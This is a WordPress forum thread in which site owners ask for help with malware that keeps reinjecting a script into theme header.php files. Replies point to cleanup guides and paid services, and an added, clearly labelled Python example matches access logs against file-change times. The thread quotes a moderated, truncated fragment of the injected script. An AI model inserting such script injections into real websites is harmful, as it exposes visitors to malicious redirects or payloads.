• Hey guys,

    I got the red malware screen on my site (https://www.thedigitalventure.com) a few days ago, and quickly discovered all my sites had been infected.

    So I ran some tests using Sucuri and Wordfence, which allowed me to locate the malicious code.

    This code was in the <head> tags of each of my theme header.php files:

    <script>var a='';setTimeout(10 [code moderated] nent(window.location.host))+'"><'+'/script>');}</script>

    I removed it, submitted a request to Google and my site was back online. Unfortunately, it came back after 2 days.

    From what I've read, the code I found probably wasn't the source of the infection and it'll keep coming back until I pull out the root. Problem is, I have no idea how to find it.

    At this point I'm really stuck, no idea what to do next. ANY help is appreciated!

    Thanks,
    Lewis.

    P.S. I'm on the latest version of WordPress and all my plugins are updated. I didn't update my theme though because I didn't want it to overwrite my customisations.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Read through the official codex for My Site Was Hacked.
    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    And I would definitely take the time to update the theme as that might be the culprit.

    Thread Starter lewisp91

    (@lewisp91)

    Hi Citra, unfortunately that page is not very useful, it’s just a rabbit-hole of links and “possible” solutions. There’s no way I have the time to go through all this and implement the steps.

    You can attempt to manually locate and remove the malicious code. Even the chances of an expert being able to completely clean your site are poor. Someone can spend days looking through files, removing small snippets of hacker code. If they miss one bit, the entire hack can be replaced by the hacker in a second once the site goes online.

    There MUST be an easier way…

    Please

    Thread Starter lewisp91

    (@lewisp91)

    Lol, as if my last post was removed.

    There’s no way I have the time to go through all this and implement the steps.

    There is no easier way unless you pay someone to do it for you. Even if you find the code, how did it get there? There is an exploit the hacker is taking advantage of.

    Your server software is also dated, Outdated Web Server Nginx Found: nginx/1.4.4

    https://sitecheck.sucuri.net/results/www.thedigitalventure.com/

    Personally what I did is pay a security company to clean my site and now watch it for the bad stuff.

    I too am having this code come back over and over. I’ve been down the list that citra mentioned and I know everything is clean. I’ve been down other lists where they talk about changing the wp-content directory name; I am leaving changes like this for a last-ditch effort.
    What I know so far:
    * I have 3 sites on a self hosted Macintosh server. All security updates have been applied.
    * All WordPress and all themes are up-to-date.
    * All 3 sites get infected within an hour of each other.
    * Only the header files are targeted.
    * No one has logged into any of my sites since it was last cleaned so this is not a bad password issue.
    * Although my .htaccess files get modified a lot by Backup Buddy, I don’t see anything strange or malicious in them.
    * I have cleaned the resulting code that lewisp91 has shown above only for the code to come back within 3 to 36 hours. Even though I’ve cleaned the resulting code, I am now looking for the injection code of the malware.

    lewisp91, what kind of hosting server/service are you using?

    Coming strategy for fixing this:
    * Turn off one of my sites to see if it gets infected when the others do. If so, then it’s some process running on the server.
    * Compare web server logs commands to the times when the header files get modified. This is a pain in the ass but it might find the code/IP source of the malware.

    I’m sure we are not the first people to get this. I wish someone with more knowledge of this malware would step up and tell us how to remove/fix the exploit in my server.

    Rob
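
The log-to-modification-time comparison described in the post above, as an added example that is not part of the original thread: it lists the web requests logged in the minutes before a header.php change, POSTs first. The log lines, timestamp, path and function names are constructed for illustration, and the access log is assumed to be in common/combined format.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Common/combined log format: IP - user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (time, ip, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ts, m["ip"], m["method"], m["path"], int(m["status"])

def change_time(path):
    """Inode change time (Unix/macOS st_ctime); unlike mtime, `touch` cannot backdate it."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, timezone.utc)

def requests_before_change(log_lines, changed_at, window=timedelta(minutes=5)):
    """Requests logged in the window leading up to a file change."""
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec and changed_at - window <= rec[0] <= changed_at:
            hits.append(rec)
    # File writes usually arrive as POSTs, so list those first, then by time.
    return sorted(hits, key=lambda r: (r[2] != "POST", r[0]))

# Constructed sample data (documentation IP ranges, made-up paths and times).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2016:03:10:02 +0000] "GET / HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Mar/2016:03:14:40 +0000] "GET /feed/ HTTP/1.1" 200 900',
    '192.0.2.44 - - [12/Mar/2016:03:14:51 +0000] "POST /wp-content/uploads/example.php HTTP/1.1" 200 12',
    '198.51.100.7 - - [12/Mar/2016:03:30:00 +0000] "GET /about/ HTTP/1.1" 200 4100',
    'garbage line',
]
SAMPLE_CHANGE = datetime(2016, 3, 12, 3, 14, 52, tzinfo=timezone.utc)

if __name__ == "__main__":
    for ts, ip, method, path, status in requests_before_change(SAMPLE_LOG, SAMPLE_CHANGE):
        print(ts.isoformat(), ip, method, path, status)
```

On a live server, pass `change_time()` of each theme's header.php as `changed_at`. If no request lines up with a change, that points toward a process on the server rather than a web request.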

  • The topic ‘Malware Keeps Coming Back’ is closed to new replies.